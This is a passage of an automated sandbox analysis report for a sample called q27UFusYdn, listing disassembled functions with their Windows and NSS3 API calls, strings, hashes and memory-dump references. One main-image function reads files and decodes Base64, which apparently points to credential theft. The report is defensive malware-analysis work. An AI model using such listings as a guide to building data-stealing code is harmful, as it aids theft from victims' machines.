Part of subcall function 6CED9890: TlsGetValue.KERNEL32(?,?,?,6CED97EB), ref: 6CED989E

EnterCriticalSection.KERNEL32(?), ref: 6CF2AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6CF2AFCE
PR_SetPollableEvent.NSS3(?), ref: 6CF2AFD9
EnterCriticalSection.KERNEL32(?), ref: 6CF2AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6CF2B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6CF2B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6CF2B070
PR_JoinThread.NSS3(?), ref: 6CF2B07B
free.MOZGLUE(?), ref: 6CF2B084
EnterCriticalSection.KERNEL32(?), ref: 6CF2B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6CF2B0C4
PR_JoinThread.NSS3(?), ref: 6CF2B0F3
free.MOZGLUE(?), ref: 6CF2B0FC
PR_JoinThread.NSS3(?), ref: 6CF2B137
free.MOZGLUE(?), ref: 6CF2B140

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 859b7e206d30fef330918dd25755e88821d8f79371e485bd856e119e9607c83e
Instruction ID: 8d6d0e579650c84343c2a82704ca5187bc9948db506d642e770ab244ffd11b84
Opcode Fuzzy Hash: 859b7e206d30fef330918dd25755e88821d8f79371e485bd856e119e9607c83e
Instruction Fuzzy Hash: 3E914EB5900601DFCB04DF25C880956BBF1FF4931872A85ADD81A9BB26E736FC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE28DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CE28E22
EnterCriticalSection.KERNEL32(?), ref: 6CE28E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CE28E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CE28E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CE28E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CE28EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CE28EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CE28EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CE28F00
free.MOZGLUE(?), ref: 6CE28F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CE28F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CE28F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CE28F5B
PR_Unlock.NSS3(?), ref: 6CE28F72
PR_Unlock.NSS3(?), ref: 6CE28F82

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 80137defa536eb66b1360f6fb77111b34daed99abc64a37cb12322b207841d4b
Instruction ID: f60a57da03a41a1bb1147328c1de3e3c6e7433ee84f3252607be9bb4a033b92e
Opcode Fuzzy Hash: 80137defa536eb66b1360f6fb77111b34daed99abc64a37cb12322b207841d4b
Instruction Fuzzy Hash: 345137B3E002159FEB209F68CC85A6AB7B9EF45318F35412AEC189B700E739ED4587D1

Uniqueness

Uniqueness Score: -1.00%

Function 6CF20FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6CF21000

Part of subcall function 6CED9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CE01A48), ref: 6CED9BB3
Part of subcall function 6CED9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CE01A48), ref: 6CED9BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CF21016

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

PR_Unlock.NSS3(?), ref: 6CF21021

Part of subcall function 6CEBDD70: TlsGetValue.KERNEL32 ref: 6CEBDD8C
Part of subcall function 6CEBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CEBDDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CF21046
PR_Unlock.NSS3(?), ref: 6CF2106B
PR_Lock.NSS3 ref: 6CF21079
PR_Unlock.NSS3 ref: 6CF21096
free.MOZGLUE(?), ref: 6CF210A7
free.MOZGLUE(?), ref: 6CF210B4
PR_DestroyCondVar.NSS3(?), ref: 6CF210BF
PR_DestroyCondVar.NSS3(?), ref: 6CF210CA
PR_DestroyCondVar.NSS3(?), ref: 6CF210D5
PR_DestroyCondVar.NSS3(?), ref: 6CF210E0
PR_DestroyLock.NSS3(?), ref: 6CF210EB
free.MOZGLUE(?), ref: 6CF21105

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: ed11b9226d1d30accd3a1dd7a9c728e03872aa857092df75e6b5c68fbc51ce41
Instruction ID: 8854b7119ef934e70053902167db1ac64fdd1449f174320f42b72f5211588b19
Opcode Fuzzy Hash: ed11b9226d1d30accd3a1dd7a9c728e03872aa857092df75e6b5c68fbc51ce41
Instruction Fuzzy Hash: 4D318DB5E10901ABD7029F64ED42A55BB71FF01318B288238E80913F61E732F978DBD6

Uniqueness

Uniqueness Score: -1.00%

Function 6CE84DB0 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CE84DCB

Part of subcall function 6CE70FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE187ED,00000800,6CE0EF74,00000000), ref: 6CE71000
Part of subcall function 6CE70FF0: PR_NewLock.NSS3(?,00000800,6CE0EF74,00000000), ref: 6CE71016
Part of subcall function 6CE70FF0: PL_InitArenaPool.NSS3(00000000,security,6CE187ED,00000008,?,00000800,6CE0EF74,00000000), ref: 6CE7102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CE84DE1

Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE710F3
Part of subcall function 6CE710C0: EnterCriticalSection.KERNEL32(?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7110C
Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71141
Part of subcall function 6CE710C0: PR_Unlock.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71182
Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CE84DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CE84E59

Part of subcall function 6CE6FAB0: free.MOZGLUE(?,-00000001,?,?,6CE0F673,00000000,00000000), ref: 6CE6FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CF4300C,00000000), ref: 6CE84EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CE84EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CE84F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE8521A

Strings

5s/, xrefs: 6CE84DBC

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID: 5s/
API String ID: 1025791883-340167759
Opcode ID: a524164eebdd62a8d9fa491c6450287db382a862fa44d35f984ed003241977a1
Instruction ID: 96ad8da7407ed758e922b709131a08f5718454b83cc44ea447f7d2695955547f
Opcode Fuzzy Hash: a524164eebdd62a8d9fa491c6450287db382a862fa44d35f984ed003241977a1
Instruction Fuzzy Hash: BCF17D71E02209CBEB04CF54D8507ADB7B2FF45358F35416AD91AAB781EB35E982CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CF2C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 6CF2C8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF2C8DA
malloc.MOZGLUE(00000001), ref: 6CF2C8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CF2C8F8
PR_NewLock.NSS3 ref: 6CF2C909
PR_NewCondVar.NSS3(00000000), ref: 6CF2C918
PR_NewCondVar.NSS3(00000000), ref: 6CF2C92A

Part of subcall function 6CE00F00: PR_GetPageSize.NSS3(6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F1B
Part of subcall function 6CE00F00: PR_NewLogModule.NSS3(clock,6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F25

free.MOZGLUE(00000000), ref: 6CF2C947

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: 6ec31729fd7b2745a1361f188cc081adec0b4617bd820ba64ae28558d330e8a2
Instruction ID: 2bb1a72d76628e9fba98377ea2ddceef7df0bd239f96ba27e37209d92d3ac7da
Opcode Fuzzy Hash: 6ec31729fd7b2745a1361f188cc081adec0b4617bd820ba64ae28558d330e8a2
Instruction Fuzzy Hash: 2321BBB1E007015BEF107FB99C1576B7AB8AF05259F140539E8AAC3B41EB35D514C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE0AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CE0AF47

Part of subcall function 6CED9090: TlsGetValue.KERNEL32 ref: 6CED90AB
Part of subcall function 6CED9090: TlsGetValue.KERNEL32 ref: 6CED90C9
Part of subcall function 6CED9090: EnterCriticalSection.KERNEL32 ref: 6CED90E5
Part of subcall function 6CED9090: TlsGetValue.KERNEL32 ref: 6CED9116
Part of subcall function 6CED9090: LeaveCriticalSection.KERNEL32 ref: 6CED913F

FreeLibrary.KERNEL32(?), ref: 6CE0AF6D
free.MOZGLUE(?), ref: 6CE0AFA4
free.MOZGLUE(?), ref: 6CE0AFAA
PR_ExitMonitor.NSS3 ref: 6CE0AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6CE0AFF5
PR_ExitMonitor.NSS3 ref: 6CE0B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CE0B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6CE0B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CE0B03C

Strings

Unloaded library %s, xrefs: 6CE0B023
%s decr => %d, xrefs: 6CE0AFF0

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 2bbea407fec2dfbd103f0db21d632088abcff38804c311dc7937c37fcf1f5a71
Instruction ID: 2a2d5078cd47dca4a85fc993e0df21795128ca802eb7ee286c55bf3221649a79
Opcode Fuzzy Hash: 2bbea407fec2dfbd103f0db21d632088abcff38804c311dc7937c37fcf1f5a71
Instruction Fuzzy Hash: 8031F5B5F54110ABDB01AF64EC51B55B7B5EB0630CB388129E80A97B01E732E839C7F1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE56C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CE5781D,00000000,6CE4BE2C,?,6CE56B1D,?,?,?,?,00000000,00000000,6CE5781D), ref: 6CE56C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CE5781D,?,6CE4BE2C,?), ref: 6CE56C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CE5781D), ref: 6CE56C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CE56C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CE56C96

Part of subcall function 6CE01240: TlsGetValue.KERNEL32(00000040,?,6CE0116C,NSPR_LOG_MODULES), ref: 6CE01267
Part of subcall function 6CE01240: EnterCriticalSection.KERNEL32(?,?,?,6CE0116C,NSPR_LOG_MODULES), ref: 6CE0127C
Part of subcall function 6CE01240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CE0116C,NSPR_LOG_MODULES), ref: 6CE01291
Part of subcall function 6CE01240: PR_Unlock.NSS3(?,?,?,?,6CE0116C,NSPR_LOG_MODULES), ref: 6CE012A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CE56CAA

Strings

NSS_DEFAULT_DB_TYPE, xrefs: 6CE56C91
dbm:, xrefs: 6CE56C3A
extern:, xrefs: 6CE56C7E
dbm, xrefs: 6CE56CA4
rdb:, xrefs: 6CE56C69
sql:, xrefs: 6CE56C52

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 2907be15b6d92d8b18339e6046334c3a31731f97c0f4a3b7e855e8d8756671c2
Instruction ID: 3d2d80b33e9950569bfa6a8a2a44b960d3b5102fa698623414ab58adb6ab089c
Opcode Fuzzy Hash: 2907be15b6d92d8b18339e6046334c3a31731f97c0f4a3b7e855e8d8756671c2
Instruction Fuzzy Hash: 1501F7E1B1234127EA40277A3E49F66352C9F5214DFB40032FF14E0B41EA97D93441A5

Uniqueness

Uniqueness Score: -1.00%

Function 00411F30 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411F4E
memset.MSVCRT ref: 00411F65

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00411F9C
lstrcat.KERNEL32(?,04147E58), ref: 00411FBB
lstrcat.KERNEL32(?,?), ref: 00411FCF
lstrcat.KERNEL32(?,04147A38), ref: 00411FE3

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,041477F8), ref: 0040971B
Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3

StrStrA.SHLWAPI(?,041488F8), ref: 0041209D
GlobalFree.KERNEL32(?), ref: 00412199

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0041212A
StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
lstrcat.KERNEL32(00000000,00000000), ref: 00412159
lstrcat.KERNEL32(00000000,?), ref: 0041216C
lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
String ID:
API String ID: 3662689742-0
Opcode ID: 36c557b0570699eea903d19c98cc913e6d9a782b508e14753a73fb5aa098a747
Instruction ID: d5c3215e2bd1f08faed5fb03d7604f0585b4cbbeb5c4b7daf79ee1030fe867fa
Opcode Fuzzy Hash: 36c557b0570699eea903d19c98cc913e6d9a782b508e14753a73fb5aa098a747
Instruction Fuzzy Hash: B97158B6900618BBCB24EBE0DD49FDE7779AF88304F004599F60997181EA78DB94CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6CE64E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6CE278F8), ref: 6CE64E6D

Part of subcall function 6CE009E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CE006A2,00000000,?), ref: 6CE009F8
Part of subcall function 6CE009E0: malloc.MOZGLUE(0000001F), ref: 6CE00A18
Part of subcall function 6CE009E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CE00A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CE278F8), ref: 6CE64ED9

Part of subcall function 6CE55920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CE57703,?,00000000,00000000), ref: 6CE55942
Part of subcall function 6CE55920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CE57703), ref: 6CE55954
Part of subcall function 6CE55920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CE5596A
Part of subcall function 6CE55920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CE55984
Part of subcall function 6CE55920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CE55999
Part of subcall function 6CE55920: free.MOZGLUE(00000000), ref: 6CE559BA
Part of subcall function 6CE55920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CE559D3
Part of subcall function 6CE55920: free.MOZGLUE(00000000), ref: 6CE559F5
Part of subcall function 6CE55920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CE55A0A
Part of subcall function 6CE55920: free.MOZGLUE(00000000), ref: 6CE55A2E
Part of subcall function 6CE55920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CE55A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE64EB3

Part of subcall function 6CE64820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CE64EB8,?,?,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE6484C
Part of subcall function 6CE64820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CE64EB8,?,?,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE6486D
Part of subcall function 6CE64820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CE64EB8,?), ref: 6CE64884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE64EC0

Part of subcall function 6CE64470: TlsGetValue.KERNEL32(00000000,?,6CE27296,00000000), ref: 6CE64487
Part of subcall function 6CE64470: EnterCriticalSection.KERNEL32(?,?,?,6CE27296,00000000), ref: 6CE644A0
Part of subcall function 6CE64470: PR_Unlock.NSS3(?,?,?,?,6CE27296,00000000), ref: 6CE644BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE64F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE64F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE64F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE64F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE64F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE64F8F
PK11_UpdateSlotAttribute.NSS3(?,6CF3DCB0,00000000), ref: 6CE64FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6CE6501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CE278F8), ref: 6CE6506B

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 41f063d600bcbaf36fc00058b06269c95526c49a2e632acf5034aae874056a44
Instruction ID: 8f2fb781faa22feeb09380a0f7b1edb5055a89a63e55e951711fc52940b53f16
Opcode Fuzzy Hash: 41f063d600bcbaf36fc00058b06269c95526c49a2e632acf5034aae874056a44
Instruction Fuzzy Hash: 6E5106B1E612119BDB11AF26EC01AAA36B4FF0631CF34453AEC4646F12F732D52587D2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE0ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

